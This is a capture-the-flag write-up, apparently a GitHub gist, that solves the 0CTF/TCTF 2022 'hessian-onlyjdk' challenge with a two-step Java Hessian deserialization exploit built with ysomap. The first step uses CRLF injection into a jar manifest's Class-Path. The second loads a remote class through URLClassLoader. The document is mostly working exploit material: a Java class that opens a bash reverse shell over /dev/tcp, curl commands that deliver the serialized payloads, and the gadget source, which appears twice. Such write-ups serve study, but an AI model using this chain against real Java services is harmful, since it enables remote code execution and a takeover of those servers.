CykuTW/My 0CTF 2022 hessian-onlyjdk solution.md

## My 0CTF 2022 hessian-onlyjdk solution.md

      
    Raw
  

              My 0CTF 2022 hessian-onlyjdk solution.md
            
          
    My 0CTF/TCTF 2022 hessian-onlyjdk solution

I think I don't understand Java very well.
The intended solution looks more easier, but I didn't find it.
I found another complicated solution to solve it ..
The deserialization payloads are generated by using ysomap.
Step 1 is using sun.tools.jar.Main.main to create jar file on the server.
And the entry-point argument has CRLF injection, so I can inject a Class-Path which points to my server into MANIFEST.MF.
Step 2 is using the built-in SwingLazyValueWithUrlClassLoaderBullet payload of ysomap to include the jar file, and load malicous java class from my server.
# step 1

$ java -jar ysomap.jar script tools_jar.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueTestBullet.ser'

# step 2

# prepare x.jar
$ cat >MyExploit.java << EOF
> public class MyExploit {
    public MyExploit() {
        try{
            java.lang.Runtime.getRuntime().exec(new String[]{"/bin/bash", "-c", "bash -i >& /dev/tcp/127.0.0.1/8887 0>&1"});
        }catch(Exception e){}
    }
}
> EOF
$ javac MyExploit.java
$ jar cf x.jar MyExploit.class

# open http server
$ python3 -m http.server 8888

# trigger URLClassLoder payload
$ java -jar ysomap.jar script url_class_loader.yso
$ curl -v http://127.0.0.1:8090 --data-binary '@payload.LazyValueForHessian.SwingLazyValueWithUrlClassLoaderBullet.ser'


## SwingLazyValueTestBullet.java
package ysomap.bullets.jdk;

import sun.swing.SwingLazyValue;
import ysomap.bullets.AbstractBullet;
import ysomap.bullets.Bullet;
import ysomap.common.annotation.*;

@Bullets
@Dependencies({"jdk"})
@Details("Test")
@Targets({Targets.HESSIAN})
public class SwingLazyValueTestBullet extends AbstractBullet<SwingLazyValue> {

    @Override
    public SwingLazyValue getObject() throws Exception {
        String classname = "sun.tools.jar.Main";
        String methodName = "main";
        Object[] evilargs = new Object[]{
                new String[] { "cfe", "/tmp/myexploit.jar","aaaa\nClass-Path: http://127.0.0.1:8888/x.jar", "/etc/hosts" }
        };
        return new SwingLazyValue(classname, methodName, evilargs);
    }

    public static Bullet newInstance(Object... args) throws Exception {
        Bullet bullet = new SwingLazyValueTestBullet();
        return bullet;
    }
}

## tools_jar.yso
use payload LazyValueForHessian
set serializeType hessian2
use bullet SwingLazyValueTestBullet
run

## url_class_loader.yso
use payload LazyValueForHessian
set serializeType hessian2
use bullet SwingLazyValueWithUrlClassLoaderBullet
set filepath /tmp/myexploit.jar
set evilClass MyExploit
run
	package ysomap.bullets.jdk;

	import sun.swing.SwingLazyValue;
	import ysomap.bullets.AbstractBullet;
	import ysomap.bullets.Bullet;
	import ysomap.common.annotation.*;

	@Bullets
	@Dependencies({"jdk"})
	@Details("Test")
	@Targets({Targets.HESSIAN})
	public class SwingLazyValueTestBullet extends AbstractBullet<SwingLazyValue> {

	@Override
	public SwingLazyValue getObject() throws Exception {
	String classname = "sun.tools.jar.Main";
	String methodName = "main";
	Object[] evilargs = new Object[]{
	new String[] { "cfe", "/tmp/myexploit.jar","aaaa\nClass-Path: http://127.0.0.1:8888/x.jar", "/etc/hosts" }
	};
	return new SwingLazyValue(classname, methodName, evilargs);
	}

	public static Bullet newInstance(Object... args) throws Exception {
	Bullet bullet = new SwingLazyValueTestBullet();
	return bullet;
	}
	}
	use payload LazyValueForHessian
	set serializeType hessian2
	use bullet SwingLazyValueTestBullet
	run
	use payload LazyValueForHessian
	set serializeType hessian2
	use bullet SwingLazyValueWithUrlClassLoaderBullet
	set filepath /tmp/myexploit.jar
	set evilClass MyExploit
	run